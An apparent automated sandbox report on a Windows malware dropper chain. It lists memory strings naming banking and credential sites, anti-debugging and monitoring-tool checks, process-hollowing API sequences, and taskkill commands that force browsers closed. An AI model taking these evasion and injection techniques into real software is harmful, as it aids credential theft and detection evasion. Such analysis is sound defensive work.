                          Source: d0d9725343.exe, 0000000B.00000003.3092005941.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000002.3093376280.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, d0d9725343.exe, 0000000B.00000003.3092697959.0000000000FD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWl
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: firefox.exe, 0000001D.00000002.3378785506.000002149CEB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: f570600774.exe, 0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                          Source: 3981530833.exe, 00000010.00000003.3283575552.00000000013BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                          Source: file.exe, 00000000.00000002.2160947735.0000000001138000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2183506287.0000000000DC8000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmp, f30149f036.exe, 0000000C.00000002.3458889721.00000000009A9000.00000040.00000001.01000000.0000000B.sdmp, f570600774.exe, 0000000E.00000002.3180488584.0000000000E56000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                          Source: 176986cc9c.exe, 0000000F.00000003.3275055775.0000000005424000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                          Anti Debugging

                          barindex
                          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeThread information set: HideFromDebuggerJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeThread information set: HideFromDebugger
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeOpen window title or class name: regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeOpen window title or class name: gbdyllo
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeOpen window title or class name: procmon_window_class
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeOpen window title or class name: ollydbg
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeOpen window title or class name: filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeFile opened: NTICE
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeFile opened: SICE
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeFile opened: SIWVID
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeProcess queried: DebugPortJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04880C3A rdtsc 0_2_04880C3A
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043B480 LdrInitializeThunk,11_2_0043B480
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_0022D86F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0022D86F
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,12_2_00402A20
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7652B mov eax, dword ptr fs:[00000030h]0_2_00F7652B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F7A302 mov eax, dword ptr fs:[00000030h]0_2_00F7A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C0A302 mov eax, dword ptr fs:[00000030h]2_2_00C0A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C0652B mov eax, dword ptr fs:[00000030h]2_2_00C0652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C0A302 mov eax, dword ptr fs:[00000030h]3_2_00C0A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00C0652B mov eax, dword ptr fs:[00000030h]3_2_00C0652B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C0A302 mov eax, dword ptr fs:[00000030h]6_2_00C0A302
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C0652B mov eax, dword ptr fs:[00000030h]6_2_00C0652B
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_002561A9 mov edi, dword ptr fs:[00000030h]8_2_002561A9
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_00221B70 mov edi, dword ptr fs:[00000030h]8_2_00221B70
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_00221B70 mov edi, dword ptr fs:[00000030h]10_2_00221B70
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_10007A76 mov eax, dword ptr fs:[00000030h]12_2_10007A76
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_10005F25 mov eax, dword ptr fs:[00000030h]12_2_10005F25
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_00F4D4A3 push dword ptr fs:[00000030h]12_2_00F4D4A3
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B40D90 mov eax, dword ptr fs:[00000030h]12_2_04B40D90
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B4092B mov eax, dword ptr fs:[00000030h]12_2_04B4092B
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_0023C275 GetProcessHeap,8_2_0023C275
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_0022D863 SetUnhandledExceptionFilter,8_2_0022D863
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_0022D86F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0022D86F
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_0023695D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0023695D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_0022D4B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0022D4B3
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0022D863 SetUnhandledExceptionFilter,10_2_0022D863
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0022D86F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0022D86F
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0023695D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0023695D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0022D4B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0022D4B3
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_004099EA
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0040A54A
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0040CDA3
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_0040A6E0 SetUnhandledExceptionFilter,12_2_0040A6E0
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10002ADF
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_100056A0
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_10002FDA
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B49C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_04B49C51
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B4A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_04B4A7B1
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B4D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_04B4D00A
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeCode function: 12_2_04B4A947 SetUnhandledExceptionFilter,12_2_04B4A947
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeMemory protected: page guard

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: Yara matchFile source: Process Memory Space: f570600774.exe PID: 5936, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_002561A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,8_2_002561A9
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeMemory written: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe base: 400000 value starts with: 4D5AJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe "C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe "C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe "C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe "C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe "C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeProcess created: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeProcess created: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: 3981530833.exe, 00000010.00000000.3188474119.0000000000F62000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                          Source: skotes.exeBinary or memory string: AProgram Manager
                          Source: file.exe, 00000000.00000002.2161576796.0000000001179000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2183637557.0000000000E09000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpBinary or memory string: AProgram Manager
                          Source: f30149f036.exe, f30149f036.exe, 0000000C.00000002.3458889721.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: rProgram Manager
                          Source: f570600774.exe, 0000000E.00000002.3180488584.0000000000E56000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: vt]Program Manager
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BEDD91 cpuid 6_2_00BEDD91
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: EnumSystemLocalesW,8_2_00240111
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,8_2_00240170
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: EnumSystemLocalesW,8_2_00240245
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,8_2_00240290
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00240337
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: EnumSystemLocalesW,8_2_0023BB60
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_0023FBD2
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,8_2_0024043D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,8_2_0023B5BC
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: EnumSystemLocalesW,8_2_0023FE23
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_0023FEBE
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: EnumSystemLocalesW,10_2_00240111
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,10_2_00240170
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: EnumSystemLocalesW,10_2_00240245
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,10_2_00240290
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_00240337
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: EnumSystemLocalesW,10_2_0023BB60
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_0023FBD2
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,10_2_0024043D
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,10_2_0023B5BC
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: EnumSystemLocalesW,10_2_0023FE23
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_0023FEBE
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeQueries volume information: C:\ VolumeInformationJump to behavior
